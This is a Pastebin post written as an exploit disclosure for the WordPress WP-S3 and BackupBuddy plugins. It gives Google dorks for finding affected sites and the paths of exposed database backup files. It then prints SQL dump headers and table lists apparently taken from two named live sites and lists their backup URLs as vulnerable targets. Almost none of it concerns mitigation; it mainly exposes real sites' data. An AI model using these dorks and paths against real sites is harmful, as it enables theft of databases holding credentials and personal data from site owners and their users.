Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #################################################################################################
- # Exploit Title : WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9 Database Backup Disclosure
- # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
- # Date : 17/12/2018
- # Vendor Homepage : ithemes.com/purchase/backupbuddy/ ~ wordpress.org/plugins/wp-s3/
- # Software Download Link : downloads.wordpress.org/plugin/wp-s3.1.5.zip
- # Tested On : Windows and Linux
- # Category : WebApps
- # Version Information : WP-S3 1.5 Version - Ithemes-BackupBuddy 2.9 Version
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/uploads/wp-s3-database-backup.sql''
- + intext:''Powered by Shopify''
- + intext:© 2018, Holy Sparks Jewish Art & Books For Spiritual & Personal Development Powered by Shopify''
- + intext:''2015 © ALL RIGHTS RESERVED BY THE-SCHMIDT''
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
- #################################################################################################
- WordPress Amazon S3 Plugin 1.5 and WordPress Ithemes-BackupBuddy 2.9
- #################################################################################################
- # Admin Panel Login Path :
- /wp-login.php
- # Exploit :
- /wp-content/uploads/wp-s3-database-backup.sql
- /wp-content/uploads/wp-s3-backups.zip
- #################################################################################################
- # Example SQL Dump Some Informations and Tables Names => holysparks.org
- -- MySQL dump 10.13 Distrib 5.1.58, for unknown-linux-gnu (x86_64)
- --
- -- Host: localhost Database: raeshaga_wrd1
- -- ------------------------------------------------------
- -- Server version 5.1.58-community-log
- -- Table structure for table `wp_StreamPad_Tracks`
- -- Dumping data for table `wp_StreamPad_Tracks`
- -- Table structure for table `wp_affiliates_banners_tbl`
- -- Dumping data for table `wp_affiliates_banners_tbl`
- -- Table structure for table `wp_affiliates_clickthroughs_tbl`
- -- Dumping data for table `wp_affiliates_clickthroughs_tbl`
- -- Table structure for table `wp_affiliates_leads_tbl`
- -- Dumping data for table `wp_affiliates_leads_tbl`
- -- Table structure for table `wp_affiliates_payouts_tbl`
- -- Dumping data for table `wp_affiliates_payouts_tbl`
- -- Table structure for table `wp_affiliates_sales_tbl`
- -- Dumping data for table `wp_affiliates_sales_tbl`
- -- Table structure for table `wp_affiliates_tbl`
- -- Dumping data for table `wp_affiliates_tbl`
- -- Table structure for table `wp_commentmeta`
- -- Dumping data for table `wp_commentmeta`
- -- Table structure for table `wp_comments`
- -- Dumping data for table `wp_comments`
- -- Table structure for table `wp_contact_form_7`
- -- Dumping data for table `wp_contact_form_7`
- -- Table structure for table `wp_ft_wpecards`
- -- Dumping data for table `wp_ft_wpecards`
- -- Table structure for table `wp_links`
- -- Dumping data for table `wp_links`
- -- Table structure for table `wp_options`
- -- Dumping data for table `wp_options`
- -- Dump completed....
- ################################################################################################
- # Example SQL Dump Informations and Tables Names => the-schmidt.com
- -- MySQL dump 10.13 Distrib 5.1.60, for unknown-linux-gnu (x86_64)
- --
- -- Host: localhost Database: theschm1_blog
- -- ------------------------------------------------------
- -- Server version 5.1.60-community-log
- -- Table structure for table `wp_PluginManager`
- -- Dumping data for table `wp_PluginManager`
- -- Table structure for table `wp_custom_fonts`
- -- Dumping data for table `wp_custom_fonts`
- -- Table structure for table `wp_cvg_gallery`
- -- Dumping data for table `wp_cvg_gallery`
- -- Table structure for table `wp_cvg_videos`
- -- Dumping data for table `wp_cvg_videos`
- -- Table structure for table `wp_download_status`
- -- Dumping data for table `wp_download_status`
- -- Table structure for table `wp_fancybox`
- -- Dumping data for table `wp_fancybox`
- -- Table structure for table `wp_item_category_associations`
- -- Dumping data for table `wp_item_category_associations`
- -- Table structure for table `wp_links`
- -- Dumping data for table `wp_links`
- -- Table structure for table `wp_ngg_album`
- -- Dumping data for table `wp_ngg_album`
- -- Table structure for table `wp_ngg_gallery`
- -- Dumping data for table `wp_ngg_gallery`
- -- Table structure for table `wp_ngg_pictures`
- -- Dumping data for table `wp_ngg_pictures`
- -- Table structure for table `wp_also_bought_product`
- -- Dumping data for table `wp_also_bought_product`
- -- Table structure for table `wp_blc_filters`
- -- Dumping data for table `wp_blc_filters`
- -- Table structure for table `wp_blc_instances`
- -- Dumping data for table `wp_blc_instances`
- -- Table structure for table `wp_blc_links`
- -- Dumping data for table `wp_blc_links`
- -- Table structure for table `wp_options`
- -- Dumping data for table `wp_options`
- -- Dump completed...
- #################################################################################################
- # Example Vulnerable Sites =>
- [+] holysparks.org/wp-content/uploads/wp-s3-database-backup.sql
- [+] the-schmidt.com/blog/wp-content/uploads/wp-s3-database-backup.sql
- #################################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################################
Add Comment
Please, Sign In to add comment
